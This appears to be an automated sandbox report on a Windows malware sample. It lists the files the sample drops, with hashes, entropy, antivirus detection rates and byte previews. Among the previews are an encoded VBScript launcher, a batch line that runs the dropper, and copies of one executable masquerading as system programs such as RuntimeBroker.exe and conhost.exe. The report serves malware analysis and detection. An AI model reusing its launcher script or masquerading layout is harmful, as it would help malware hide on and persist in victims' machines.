                SHA-512:22CA0AA1BAEC8C829F1046FB2DB2D2044B8D6A524DE804350DFBD15F7D9194C7B6BB622D43C4A8C6B5A593421669FF777362CE9CB5B818D802563303B09E5222
                Malicious:false
                Preview:Gueliblt0IlnmTLrXzt1URfxjBFhpcdhveHTdxDIAMdEtLAADbfqQWvzPrBgVEDXpD1IL1Okwl1HxaEYBFdO7xRZsSEwvgx6JFZpU2yMM

                C:\ReviewHost\AFKwztugVSPq.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe

                Download File
                Process:C:\Users\user\Desktop\hx1hwVZIjy.exe
                File Type:data
                Category:dropped
                Size (bytes):216
                Entropy (8bit):5.800344216163756
                Encrypted:false
                SSDEEP:6:GVwqK+NkLzWbHhE18nZNDd3RL1wQJRtgNlUNOsZpIs:G4MCzWLy14d3XBJwNOFis
                MD5:7B4906D1CB87DE73F115581DCAF9E232
                SHA1:0E02CAA3CE91FC59267606430158C7D3E112B700
                SHA-256:9C3B3E61CE002F1D33D5228DBBF535400F16646F1D83747251FF7849C5A32495
                SHA-512:5F6F967A49C329A6946BBE0C2D43AD4751D9A914DDF244C1055FB0678A1982F60401DBDBDE153B2027652E23EB83E2AC7D9BE77A897D5023435E3AEF65AABB96
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:#@~^vwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJIn7k.hCK/D&pDYXjDr.8t56hhyD/1X#ak"q\l;C8 (lOJB~!BPWC^/+nD0AAA==^#~@.

                C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat

                Download File
                Process:C:\Users\user\Desktop\hx1hwVZIjy.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):29
                Entropy (8bit):4.017824858003425
                Encrypted:false
                SSDEEP:3:I5wlS1dRLAE:IulgR0E
                MD5:17370288E4E03FAD288831AE1F887483
                SHA1:8AFDD43B5B01EE9517981E8E285113E2A08305F2
                SHA-256:AB7FE15930980A0B150427E5A7BDA9234292FA63E6358654EA2E356DDBCEAF66
                SHA-512:00E0253A0CA8AC0E8F44B716ED4357AC4790D2809172FDC5385607A888449E03F634444AC8E8689615A0AD7ED162F6B42EC4E0B2AECEA532C66575D047F22162
                Malicious:false
                Preview:"C:\ReviewHost\brokercrt.exe"

                C:\ReviewHost\RuntimeBroker.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\ReviewHost\brokercrt.exe

                Download File
                Process:C:\Users\user\Desktop\hx1hwVZIjy.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\ReviewHost\conhost.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\0a769a02709f5e

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):224
                Entropy (8bit):5.7262312803738915
                Encrypted:false
                SSDEEP:6:of/+MhYZNoYJQqSo4/EpBMkWcmBxNK3loYov7:C/+nZNoHq1yECX5Kopv7
                MD5:46B284915767596BDFF17E1D905BE065
                SHA1:0A1A64C39D2344DD8673E1F0AF4305BA740388CF
                SHA-256:569F08A448D8A5E00C8C1944273F275B5865798EB5D129F4AD4523C8E80F8A5A
                SHA-512:D7D831FB1DAAAB0DDFCD2A43B7C194392DEB2AA2527EE86D3EA842D2FE0E05DC0247041E985EA7FC51D9BCC6A8C63ABE0FF54C5063DC916D75CF0F02FF530AFD
                Malicious:false
                Preview:WkUZSTnOzMPwyOkSCwrfac3OlNUv4dArLWPDFZHaS4EkJrVwhdb7CCw4rGxF82UWLhkc8gMmpRMfXSE41iNaCCpIjVW8mCcZkrZlG3yAQySvzQgYB3NZp3UI2c2mJOAnzx5p3dx8uNJNu4SSy86syCuqXQsoAL0Cyp5CV1eiGPpbtHY8JkyLRRyxDPSnuI7jWHYF8Q77eYmjWS6P2ueaWpvh1I8Gi1x7

                C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\4e3ac3462c9605

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (984), with no line terminators
                Category:dropped
                Size (bytes):984
                Entropy (8bit):5.905747785877706
                Encrypted:false
                SSDEEP:24:cfAR8LFjo8ErMVrPmr15cIVxdibgKsHP+avlKP3Um/37ZCK:cU8LFJuSw1bxdWgBHPpdyEm/EK
                MD5:FABD7C31B3240FE5773BA62A145EF7CA
                SHA1:016A5F9F134C42F4D98D292ACE18982F67DA5F7F
                SHA-256:4EFA74CBCD64A79A35B908AEE8D20D3DFA4643AF0999A5AFE508F6D58AA73547
                SHA-512:2DB6137530A82B05B011C35A3506A3CCD749F25567F9A5F7C03E3D7DAE212EB82447AFA7E3068D00831F7E3B32EC4DE52A29BC1E1D4E130AD5C2826BB2168EB6
                Malicious:false
                Preview:DifVjQ9ppEap2EQFsyTw4LZvAbMytcxKxh72rYEkJHlk2kLqrhLbUfE2JtVHDK5MRP2UGXYTutmwjy3ZPgGMRV0RdEt7D6h8LYTms0jTI2rl3RTU051hEt55Yk1CoaPxMnkKeQrZ6wDYoPXLvYGIE94cdYNH9hosm3ZPrI0kNckRqgRJMpQQUGtMsIrGCkZYIVwu0Hemhg5mZnv6GE4TRYYfKMhibuinCMJVugTFLnsxLGxFWu98pGGt6Qknk5Lx7SjMeaMjuzInpkUDZcMruk76FZYe6qePc503hkk6hZN07dEW5gNIteDXUnHFBsnEU3Luubgz1QJUWH8mVBiZcWf81ci3df4ywJfERTmeAYQdUsBNoetAKOl8XN2R2mVWWViMl4UBYDYDFCnIaVP8v3oihgrEaUmYC4H9KymtJslHzh3Ujt1hWWkcqAoFNQkEaAAK5o8ltfyDShtAmWeqdFBqUoSKKhg3HhqygtZ5vPx0ihKJQoc1w3kV9U0QVxbM955u14d36i5NRKIxeJ3fEpGN6UzL2Ik7yl1mlZSWLi4O8WEyMDwM46HUysygFRBy77ZpTfMF0hTgu2PkQB9zWYD2egx2lvR4gGQB6Yer1rVXmkk6dNQDSLbj4hKwrTeEPZ9nmNn1gS8oCpQ461ZXfNmVoqGZNs9hMQHMk6TPkYhANxhORQzz3GjCxo95HNnySabviDTAhKxGqmH1J2I72JnGrFY66YIWvsrxVvqN6zStTdWLgHwOFq6IwVEdoXDJCaV74UgXM4AD14wOsNZzm3QFwiA9rNijvIr2IYQMlZCLp2R1j0ub8OhIKPKVThp8VbRsN3GT6MNM0FZ3RIa1dHlglis2O52EtDzOliopuafvAURE0QDLHyfOzuHoLOFBUJdxQLStduHCmzgQQnB71r65hkY0aAegUeb01eyp8TrWrcmAO0XhMHJmNhPpwcTdQksIYpZwyW9h9kOE7Ymjm6TM

                C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\Default\WinStore.App.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\Default\fd168b19609dff

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (982), with no line terminators
                Category:dropped
                Size (bytes):982
                Entropy (8bit):5.910045565114596
                Encrypted:false
                SSDEEP:24:kw1X5ENsVXlWNK6mYqYRIubEfHoUmWdu6qWm:kwFSO7VPusN7u6Tm
                MD5:221C7A37053BD1E6D7317199DA5C663D
                SHA1:4E8AC3707F9A6CC7EFFAD9E1DD7C22EDB7C27B3F
                SHA-256:5F37600F78429E90E53144DBFEFE59B713909CCD352A2E314A5CBD6FF13F666A
                SHA-512:196DA862B0B3ACAAC3EA2A081A67FFA9AA7EDD530EC95F5434981CBB10B668FFB59D5CA728B8292FA868158A97842D67BEF4E55FA9CEB29C9D23273E47C4D905
                Malicious:false
                Preview:02bZTcBsGOrPtHbdi8CWoLLMBvY8RSiUxwfgj6hvcFxuEqOQGuVzGNUoqOXiDCbxpWc6m43laR4iYaIVgI2g7tOjc0zUi9rZo9ErOSoL0tYzTwPQGCB5K406I2evFjCaje3ZVbHOeqqNUZQpkjNg8wOtIIiVy2FRq7Py204p5xbeOnmtmyLgVgcxQJQN2valkZgWJbxuoilKUuffgzt9ri5KfcisjqxKX03yGPjKBa1x5ScfovrCBa3CdW1r3EK8ubxe1qZQQi8QqIPN9CEx9vI760VtY1R6Q3Dde8o7WavccnVVHor0AX99S0iAVp1YRBAxFvsBYHbi9qeSf9muJb634DLoZnlrjWLanhQV6qc25bAmVQeVCHO0EH2BkDmuft9meEp7tQyd8D7dDiTJJQobIVVgoOv2ErXLbXHQkgmwTv1AJZ7BuclOFheJsJSef5ZRqvBpaCimo2HWeUWPRtIlGIG438ibNHQYVjUYYRlr48kNZHpXxDNvwyKhpHwceHYgltB4A719IbrHh3evSKoK4flhZwtQfINwkDmqGvXzMOmVHD9vnAJUdOmFIdfNOke9N4hdRyphwz7q2PaVw7ne93TVbghmQKkmunHMfgeyVlhnQ6N2DJaR69AUkLCvQCRmOV5PHN0QczIXVpEeSojGtTpumwmTdthSU5Z5A8u0SJyH1n94HhcmdK25pLmVkgxsRzCZQJeU3syjei39xrM5R5zKDdPzVZPwWG0Bkkn7DIsuWSbHSnh3T1bVA2Vx3p8ddBNYr1ZNEO2INEyvCHgs1WcfofBsO0EYJORUFDaaNUyF8SI5EkuvIPlHjrtM0q8NKd88xdq9rGehhXhWXFnnFSQ4nJvXTNjgWl4eTJHk4vEBuEkLKXzvDVI2NEVnrSpdh7L6cCCN7DtTOOJijjN6YxdAcCROye3lFkew3ntIUly9lyo95wEHFtFteKdavxYdKHNntWo50Fmw9dYoXR

                C:\Users\Public\0a769a02709f5e

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (312), with no line terminators
                Category:dropped
                Size (bytes):312
                Entropy (8bit):5.814598476896805
                Encrypted:false
                SSDEEP:6:w+YcgjDIVn10SpwEfIK9aUCUSfaSLnh1moW98NxV/KMn:eGfpwS9awSfaSLnh1JJNSMn
                MD5:615B6668C8CFDCDF679F813C06B2F105
                SHA1:29328692650D8C0B3B31564AE7029B00B4FF9B1C
                SHA-256:BA9A58C6FB49FA4D92E9B1AEB44AF4D40E8677624AC344D1E1CC35C9C45E0AE8
                SHA-512:F544656F0F020D04C9DF0DAC26A88B93DDA280E9CB66A7E6FB82CADEE1B64A6F922B48FDF8567D9FC53BF86A6480624FA8CC4A9C2C31011F9AD1C28B22962CEC
                Malicious:false
                Preview:420QodaNotsVwdhswy4FUAzhONynraCbp05mIbAalgzHQRLTWmp6O283CTCbpwgOqQp6i4jUxddxLsQ6CeREuGMw1BkzZjvzAla9mOvcDVJuYLsTCGYKfbdkD2FgUu5OsowkSQUytzBZ7cYpSQwSKkUiH06tIOHSZ4CuYIBvwkbqaDnleZOD7mDHUOcbUkpfrsACZnRKPAgjInIDNUOsAEUx04aKpjbL569rDkL1IDy7Fd8qFZOAV6fmYMLfNGfpjVoMobAmIXk6PXrW5tFQUaz8aWT1YqnChIXuzwBoYm18WiWAezjdBPVI

                C:\Users\Public\AFKwztugVSPq.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\Public\Videos\0a769a02709f5e

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (639), with no line terminators
                Category:dropped
                Size (bytes):639
                Entropy (8bit):5.898013984508367
                Encrypted:false
                SSDEEP:12:BmWkbRTCB9wyOxrO7fyykI6rW/LhIg8mCzgppGdbZHr3ii15m64nySt+:iWBq+fYIX/LawYLHWi1YMSo
                MD5:31AEDE27A337AC8C389F4669CDE99529
                SHA1:9B0B94024E08853B9F478ECF4EEAA19900AECB49
                SHA-256:C7DD0AE8CA552C1555A626DC8A481D5BE8C740930AA6662B47635AEB35AB9C7E
                SHA-512:B23AB848C890E986E0E21851A822F42E9039E24F776637F40560A28833087C0EAA026B1DD6A083CC45B8A344F4F25BE86C0AF5C72D1F77D6057745AF0F933011
                Malicious:false
                Preview:0r3pOavSCvAngMrW0N0S0YmkoRPMTgjulxf811mrNxgGxTv4YQ2FJkwcESA7Li8fLPBtqte8lJED1gxUgVyCodlAAD3j1ogoyA4iSBNow3dAgskhfqbzu61soAtnz4H7maP1mPCeIJQvAkeRcVEKNq42JM3RSkz1vgXFdt5Qo6rkpGrDfbKd07t6gWraVuMhUY9dMZxtaxgR9UMDe0v0aWAywbjHBf43tJPRGO0GnaCCac6MKo5f9VH8XLqv0qs43nhzE47Q9pN9T8XUeX7WjZ3YCR44hFQ7sIJx5HHPrpfUIIoZyWQdtVVdtJxwACt4YPQLyjZXPrp43jP4meGKywNXxpDvTVOp6l521dkO62OBpajK33Jg6iFmB3XIfnE3dA7SnWDJ31O6iMrWG32aLssYfT07FcsTyUhpdQhg0AmEUIDzMBCmvnrvRjwUgFDbI4IOoB2zWVkLFoDWPBuEaGhKmwX3eMAu7L6ZAzKKIMQZDgqnfZEeU8BBX7m2n9VJV0O3roWa0k5N0IHGGuYEIfZ8K4CDMSgJ1GDMRw51DnouDxLOzgw3kQBzbQtxmSNiDvVtE4yTyhAe1o4WsxNqgnjlFOvBCIOuZGqRccJ5rcEDPg8wVXEyFhBaMun0JxR

                C:\Users\Public\Videos\AFKwztugVSPq.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\0a769a02709f5e

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (625), with no line terminators
                Category:dropped
                Size (bytes):625
                Entropy (8bit):5.886937514286972
                Encrypted:false
                SSDEEP:12:RMC8ZszG/5pyssHvvgZl2+YmEr5DvBCBNHKJg4mA7KwH6hCINX5Rk:j8HissHvYfYmEFD2Fd4mA+y6/NX52
                MD5:10BEA9F4AF17C9CCE917A30F99A421CB
                SHA1:85BA9870E08267B669F447C7C1E98C2FFACB8C0A
                SHA-256:312B7C83E50C290832726D8E8E4F410034D5F18FF9E99425B528F93ADC0EC206
                SHA-512:0D7394E116118F08F0B7FC29049A0E9F01BC7C3247B22DAD1B7F9D2E1A16F6B0979F64FE4C30ACAC9D95DE77FC9327149B10EAF3CA9715F833A3CE72283E20F3
                Malicious:false
                Preview:CgEmRmlX1zOMlkMdAM5jwvjIK0yiBlQmztffGewF8huSWbMpZmyeMlzQ76baxCVPilX2EqXfZzlPBQvtnIIYxwaN3PiKCVS5LeuuDUlsPSEW9jOrKswp47cwLJ8zIMcEhpEhgBpThZJerDNUB1AUimBNC7i3VvkCzAzUfrLJCcHex7FI5oyRMIf4o0eicw8vzHorN3yTq1SFfhaF2a7r7T0re5poMmqQeWoqSX5CzekUzaZHaZpByRygQ7NSOKHDKCkJ2txef51csf1DfiOw6pbNhIZVKmypXgKxzQOqmLg2ZVxvFJwp5UHfkXluTcU2HMFLVEOPThKvIjyMUoPB0ItCZoNboeWK0nuMPmZA4gWYJVWBjZZpMTC9dDvq0wlyKA5eyl6sOPGTvV2ERM2PEr8hlvtM0tKI5hNJa2M8dra7NsNHKrYo3WtdCX3D1t1fE7YOHtnZ94wXRBU2hmCJVfOixuGC8JGtz52PT99aD8p9kWLBDAfPrsJjt0aXmlazyChVJFjimmFW0P8aiF98o1CHvSgdjlxchzKhz028b6nFnxtd19zhmcL6Aak0iF9AynyAEalsNAhrO7d8jCljwQ0FoOhZPBZV7nQ98sYbYHTl5dsC6

                C:\Users\user\AFKwztugVSPq.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AFKwztugVSPq.exe.log

                Download File
                Process:C:\Users\Public\Videos\AFKwztugVSPq.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
